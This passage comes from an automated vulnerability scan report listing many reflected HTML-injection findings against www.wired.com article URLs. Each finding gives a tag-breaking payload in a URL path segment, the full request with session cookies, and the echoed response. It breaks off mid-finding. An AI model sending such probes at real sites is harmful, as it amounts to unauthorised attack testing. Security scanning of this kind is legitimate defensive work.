<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science8d636"><a>723f04a76bb ss_discoveries c_news">
...[SNIP]...

1.738. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1014

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bced9"><a>8dfd94670a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesbced9"><a>8dfd94670a4/news/2008/10/dayintech_1014 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesbced9"><a>8dfd94670a4 c_news">
...[SNIP]...

1.739. http://www.wired.com/science/discoveries/news/2008/10/dayintech_1014 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/10/dayintech_1014

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448da"><a>54c19bc128c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news448da"><a>54c19bc128c/2008/10/dayintech_1014 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:37 GMT
Date: Sun, 21 Nov 2010 23:12:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news448da"><a>54c19bc128c">
...[SNIP]...

1.740. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1110

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57bba"><a>ebeb21542cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science57bba"><a>ebeb21542cb/discoveries/news/2008/11/dayintech_1110 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:14 GMT
Date: Sun, 21 Nov 2010 23:11:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science57bba"><a>ebeb21542cb ss_discoveries c_news">
...[SNIP]...

1.741. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1110

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efacc"><a>98895960f43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesefacc"><a>98895960f43/news/2008/11/dayintech_1110 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:30 GMT
Date: Sun, 21 Nov 2010 23:11:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesefacc"><a>98895960f43 c_news">
...[SNIP]...

1.742. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1110 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1110

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14b39"><a>04ac77873cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news14b39"><a>04ac77873cd/2008/11/dayintech_1110 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:41 GMT
Date: Sun, 21 Nov 2010 23:11:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news14b39"><a>04ac77873cd">
...[SNIP]...

1.743. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1113

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c12"><a>9b08e999a3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science33c12"><a>9b08e999a3c/discoveries/news/2008/11/dayintech_1113 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:08 GMT
Date: Sun, 21 Nov 2010 23:11:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science33c12"><a>9b08e999a3c ss_discoveries c_news">
...[SNIP]...

1.744. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1113

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef87"><a>44656895f30 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries9ef87"><a>44656895f30/news/2008/11/dayintech_1113 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries9ef87"><a>44656895f30 c_news">
...[SNIP]...

1.745. http://www.wired.com/science/discoveries/news/2008/11/dayintech_1113 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2008/11/dayintech_1113

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b064d"><a>cc5c37043de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/newsb064d"><a>cc5c37043de/2008/11/dayintech_1113 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb064d"><a>cc5c37043de">
...[SNIP]...

1.746. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0123

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e0f8"><a>5f6502cac4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science3e0f8"><a>5f6502cac4b/discoveries/news/2009/01/dayintech_0123 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Sun, 21 Nov 2010 23:16:13 GMT
Date: Sun, 21 Nov 2010 23:12:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science3e0f8"><a>5f6502cac4b ss_discoveries c_news">
...[SNIP]...

1.747. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0123

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9bbc"><a>f4bd770cc4f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriese9bbc"><a>f4bd770cc4f/news/2009/01/dayintech_0123 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:51 GMT
Date: Sun, 21 Nov 2010 23:12:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese9bbc"><a>f4bd770cc4f c_news">
...[SNIP]...

1.748. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0123 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0123

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22bd1"><a>af088f8d408 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news22bd1"><a>af088f8d408/2009/01/dayintech_0123 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:23:03 GMT
Date: Sun, 21 Nov 2010 23:13:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news22bd1"><a>af088f8d408">
...[SNIP]...

1.749. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0129

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69728"><a>07ad95f1437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science69728"><a>07ad95f1437/discoveries/news/2009/01/dayintech_0129 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:16:38 GMT
Date: Sun, 21 Nov 2010 23:12:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science69728"><a>07ad95f1437 ss_discoveries c_news">
...[SNIP]...

1.750. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0129

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea663"><a>000f8426a7e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveriesea663"><a>000f8426a7e/news/2009/01/dayintech_0129 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=569
Expires: Sun, 21 Nov 2010 23:22:23 GMT
Date: Sun, 21 Nov 2010 23:12:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesea663"><a>000f8426a7e c_news">
...[SNIP]...

1.751. http://www.wired.com/science/discoveries/news/2009/01/dayintech_0129 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/01/dayintech_0129

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad09"><a>6fa0ecd3e27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science/discoveries/news7ad09"><a>6fa0ecd3e27/2009/01/dayintech_0129 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=557
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:13:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news7ad09"><a>6fa0ecd3e27">
...[SNIP]...

1.752. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/02/dayintech_0205

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bda0"><a>ff99168443b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /science8bda0"><a>ff99168443b/discoveries/news/2009/02/dayintech_0205 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=217
Expires: Sun, 21 Nov 2010 23:16:07 GMT
Date: Sun, 21 Nov 2010 23:12:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science8bda0"><a>ff99168443b ss_discoveries c_news">
...[SNIP]...

1.753. http://www.wired.com/science/discoveries/news/2009/02/dayintech_0205 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /science/discoveries/news/2009/02/dayintech_0205

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ddb8"><a>86307e83414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

